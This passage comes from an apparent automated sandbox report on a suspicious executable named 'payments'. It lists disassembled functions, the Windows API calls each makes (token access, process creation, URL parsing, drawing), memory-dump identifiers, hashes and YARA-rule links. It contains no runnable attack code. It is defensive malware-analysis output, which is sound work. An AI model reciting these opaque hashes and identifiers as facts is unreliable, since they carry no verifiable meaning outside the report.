                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3016257755-0
                                                                                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                          • Instruction ID: ab353c564d3e2375f9d8c4acb42a4ca03556a8c64a99e6ec534b4d9ad523598f
                                                                                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                          • Instruction Fuzzy Hash: 6501493200014EBBCF1A5E84DC21DEE7F23BB18350B5A8559FE2859031D336DAB2BB81
                                                                                                                          Function 00CB7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 00CB7AD8
                                                                                                                            • Part of subcall function 00CB7CF4: __mtinitlocknum.LIBCMT ref: 00CB7D06
                                                                                                                            • Part of subcall function 00CB7CF4: EnterCriticalSection.KERNEL32(00000000,?,00CB7ADD,0000000D), ref: 00CB7D1F
                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 00CB7AE5
                                                                                                                          • __lock.LIBCMT ref: 00CB7AF9
                                                                                                                          • ___addlocaleref.LIBCMT ref: 00CB7B17
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1687444384-0
                                                                                                                          • Opcode ID: 142d256a79f6b83ef4c211b4219b14e34f0e3ece4c39e3ba821679001437f9ff
                                                                                                                          • Instruction ID: 84e9cef2d6ed2793626247f4d9cfcced8fa1999e44a280e0dea96f948c0dc884
                                                                                                                          • Opcode Fuzzy Hash: 142d256a79f6b83ef4c211b4219b14e34f0e3ece4c39e3ba821679001437f9ff
                                                                                                                          • Instruction Fuzzy Hash: CF016D71444B00AFD720DF79D90578ABBF0EF40325F20890EA89A977A0CB74A684DF11
                                                                                                                          Function 00CFE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CFE33D
                                                                                                                          • _memset.LIBCMT ref: 00CFE34C
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53D00,00D53D44), ref: 00CFE37B
                                                                                                                          • CloseHandle.KERNEL32 ref: 00CFE38D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3277943733-0
                                                                                                                          • Opcode ID: ac0005ec26a8c99e1b471ea64ef3cad4f44b7d9ca34e7a709b87d12d9343aaaa
                                                                                                                          • Instruction ID: ff11a250fc61cfa6338f1d4c0a000ab544e114691914b821091934bba76ea2bc
                                                                                                                          • Opcode Fuzzy Hash: ac0005ec26a8c99e1b471ea64ef3cad4f44b7d9ca34e7a709b87d12d9343aaaa
                                                                                                                          • Instruction Fuzzy Hash: 53F05EF1540304BAE6101B60AC45FB77E7CDB04796F004422BE08D62A2E7759E1096B8
                                                                                                                          Function 00CFEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAAFE3
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAAFF2
                                                                                                                            • Part of subcall function 00CAAF83: BeginPath.GDI32(?), ref: 00CAB009
                                                                                                                            • Part of subcall function 00CAAF83: SelectObject.GDI32(?,00000000), ref: 00CAB033
                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFEA8E
                                                                                                                          • LineTo.GDI32(00000000,?,?), ref: 00CFEA9B
                                                                                                                          • EndPath.GDI32(00000000), ref: 00CFEAAB
                                                                                                                          • StrokePath.GDI32(00000000), ref: 00CFEAB9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1539411459-0
                                                                                                                          • Opcode ID: 349c34bebaf56d000cbe8ec2bda087259614b98e0e8766c2e0f4c1d2c23c1378
                                                                                                                          • Instruction ID: 4facdfd9327d53c69a42c12bc56a33bae7eca85bff4c05ed58d8554500eec9ad
                                                                                                                          • Opcode Fuzzy Hash: 349c34bebaf56d000cbe8ec2bda087259614b98e0e8766c2e0f4c1d2c23c1378
                                                                                                                          • Instruction Fuzzy Hash: 06F05E31045359BBDB12AF94AC0DFCA3F5AAF0A311F048201FE11A12E1CB749662DBA6
                                                                                                                          Function 00CCC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCC84A
                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCC85D
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CCC864
                                                                                                                          • AttachThreadInput.USER32(00000000), ref: 00CCC86B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2710830443-0
                                                                                                                          • Opcode ID: e58d3391f2f218709bf65267a0533027e28442f79cb0c1716d21d56229d0d572
                                                                                                                          • Instruction ID: 5600682df064cff3d04ecbf1c614efcdff5d8137b0d92a39da5ab1bd55a89822
                                                                                                                          • Opcode Fuzzy Hash: e58d3391f2f218709bf65267a0533027e28442f79cb0c1716d21d56229d0d572
                                                                                                                          • Instruction Fuzzy Hash: 8EE0F271141228BAEB201BA2DC4DFDB7F5DEB167A1F408025F60DC45A1CBB58582CBA0
                                                                                                                          Function 00CCB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CCB0D6
                                                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0DD
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CCAC9D), ref: 00CCB0EA
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CCAC9D), ref: 00CCB0F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3974789173-0
                                                                                                                          • Opcode ID: c103b79cd7403381ddf73c2d719fb7a3136446df87e72d6acd2fc364c2e5ac7e
                                                                                                                          • Instruction ID: 9ad000003eeb03cbb8931841bc5a1613a6dea42f2d96f4908f07a6bb3c7ba677
                                                                                                                          • Opcode Fuzzy Hash: c103b79cd7403381ddf73c2d719fb7a3136446df87e72d6acd2fc364c2e5ac7e
                                                                                                                          • Instruction Fuzzy Hash: E8E04F72601321BBD7205FB29D0DF873BA9AF55791F01C818E251D6140DF348442C770
                                                                                                                          Function 00CAB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000008), ref: 00CAB496
                                                                                                                          • SetTextColor.GDI32(?,000000FF), ref: 00CAB4A0
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00CAB4B5
                                                                                                                          • GetStockObject.GDI32(00000005), ref: 00CAB4BD
                                                                                                                          • GetWindowDC.USER32(?,00000000), ref: 00D0DE2B
                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0DE38
                                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00D0DE51
                                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00D0DE6A
                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00D0DE8A
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00D0DE95
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1946975507-0
                                                                                                                          • Opcode ID: a04eabb5f354cc6a854cc1859850f97b94277343bb95a0d9aa9cd7ced8077e0c
                                                                                                                          • Instruction ID: e38772ef2d052af5b8b2811dc91f6c964dad17f561664d6dd65815238a752906
                                                                                                                          • Opcode Fuzzy Hash: a04eabb5f354cc6a854cc1859850f97b94277343bb95a0d9aa9cd7ced8077e0c
                                                                                                                          • Instruction Fuzzy Hash: 99E0E571100340BEDB215BB4EC09BD83B129B56335F14C656F679980E6C7754581DB31
                                                                                                                          Function 00CCB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CCB2DF
                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00CCB2EB
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCB2F4
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00CCB2FC
                                                                                                                            • Part of subcall function 00CCAB24: GetProcessHeap.KERNEL32(00000000,?,00CCA848), ref: 00CCAB2B
                                                                                                                            • Part of subcall function 00CCAB24: HeapFree.KERNEL32(00000000), ref: 00CCAB32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 146765662-0
                                                                                                                          • Opcode ID: 679d97c7661f112f88c260068aa55d7abe129843e36a33ba57e6c8e4277fb72f
                                                                                                                          • Instruction ID: 3f73cfa4fad6c9c9c5729a078806db6f65a696746e08b9b4139d56169b5518ab
                                                                                                                          • Opcode Fuzzy Hash: 679d97c7661f112f88c260068aa55d7abe129843e36a33ba57e6c8e4277fb72f
                                                                                                                          • Instruction Fuzzy Hash: B0E0BF36104205BBCB012B95DC08899FBA7FF89321310C221F625C1671CF329872EB61
                                                                                                                          Function 00D0B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2889604237-0
                                                                                                                          • Opcode ID: 3f4eabff430fed95da22abed55a100aea5ebd2f5625ee03e433d33befdd6384e
                                                                                                                          • Instruction ID: 742a75385cc4f49897b826c413a83dab3aefc04bfda928abe807aab452404ecc
                                                                                                                          • Opcode Fuzzy Hash: 3f4eabff430fed95da22abed55a100aea5ebd2f5625ee03e433d33befdd6384e
                                                                                                                          • Instruction Fuzzy Hash: 72E09AB1500318FFDB015FB098486AE7BA6EB4C365F11C816F95AC7351DF7498429B64
                                                                                                                          Function 00D0B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2889604237-0
                                                                                                                          • Opcode ID: 385632c7d8074c167e38c723f25fd21a8887b3988b4ac7c621f946d68ff8b049
                                                                                                                          • Instruction ID: 0b537d296bfb07a9f33ca899509daa5189952e53c16c13202f1a98cad580f6bd
                                                                                                                          • Opcode Fuzzy Hash: 385632c7d8074c167e38c723f25fd21a8887b3988b4ac7c621f946d68ff8b049
                                                                                                                          • Instruction Fuzzy Hash: 45E046B1500308FFDB005FB0C8486AD7BAAEB4C364F11C809F95ACB320DF7898028B20
                                                                                                                          Function 00CCDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00CCDEAA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContainedObject
                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                          • Opcode ID: 53c1bcb6f07d93d778ea9b1b95680859e467884b8b568d18692be83e4f935f62
                                                                                                                          • Instruction ID: 647642086ad98fa66fe2878c88bd26e0a5852d39c66337234c9d6897de099c1b
                                                                                                                          • Opcode Fuzzy Hash: 53c1bcb6f07d93d778ea9b1b95680859e467884b8b568d18692be83e4f935f62
                                                                                                                          • Instruction Fuzzy Hash: 3E911570600701AFDB14DF64C884F6ABBF9BF49710B10856DF95ACB691EB70E941CB60
                                                                                                                          Function 00CABCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000000), ref: 00CABCDA
                                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00CABCF3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                          • Opcode ID: 421ee993556b18952d52b3fa1999c99778388c4a227b2a2265f30a24b1cf27c6
                                                                                                                          • Instruction ID: af357e3dbf27ff9ca4774206e2f17e8da99fce8c7ccf3395cf3b2646b166777e
                                                                                                                          • Opcode Fuzzy Hash: 421ee993556b18952d52b3fa1999c99778388c4a227b2a2265f30a24b1cf27c6
                                                                                                                          • Instruction Fuzzy Hash: 6A512B71408745ABE320AF14DC85BAFBBE8FF96358F41484DF1C8411A6EF708568D766
                                                                                                                          Function 00CDC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C944ED: __fread_nolock.LIBCMT ref: 00C9450B
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                          • _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscmp$__fread_nolock
                                                                                                                          • String ID: FILE
                                                                                                                          • API String ID: 4029003684-3121273764
                                                                                                                          • Opcode ID: a3f309c11eaae70afff9b037a8acd6f5ea36f4d80dab01bdf93a72a478090091
                                                                                                                          • Instruction ID: ad5922e020f8544a7e471d4a6a27d3b2942f7e77e4c584382686de2376187c91
                                                                                                                          • Opcode Fuzzy Hash: a3f309c11eaae70afff9b037a8acd6f5ea36f4d80dab01bdf93a72a478090091
                                                                                                                          • Instruction Fuzzy Hash: 4F41F672A0020ABBDF209BA4DC86FEF77B9AF49700F00406AF601EB181D770DA05DB61
                                                                                                                          Function 00CFA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CFA85A
                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CFA86F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID: '
                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                          • Opcode ID: 1bedf4cf876dfe06142e8f0542992d1fb8fde65c0803b958cc6b133e28fa5cfc
                                                                                                                          • Instruction ID: 3fbe7efd524d4a6c7b46cad70d55b13bdbe653ab799ff1f45b11e527f733ae55
                                                                                                                          • Opcode Fuzzy Hash: 1bedf4cf876dfe06142e8f0542992d1fb8fde65c0803b958cc6b133e28fa5cfc
                                                                                                                          • Instruction Fuzzy Hash: 4B41EBB4A0130D9FDB54DF65C881BEABBB5FB08340F14006AEA19EB381D770A941CFA1
                                                                                                                          Function 00CE5180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CE5190
                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CE51C6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
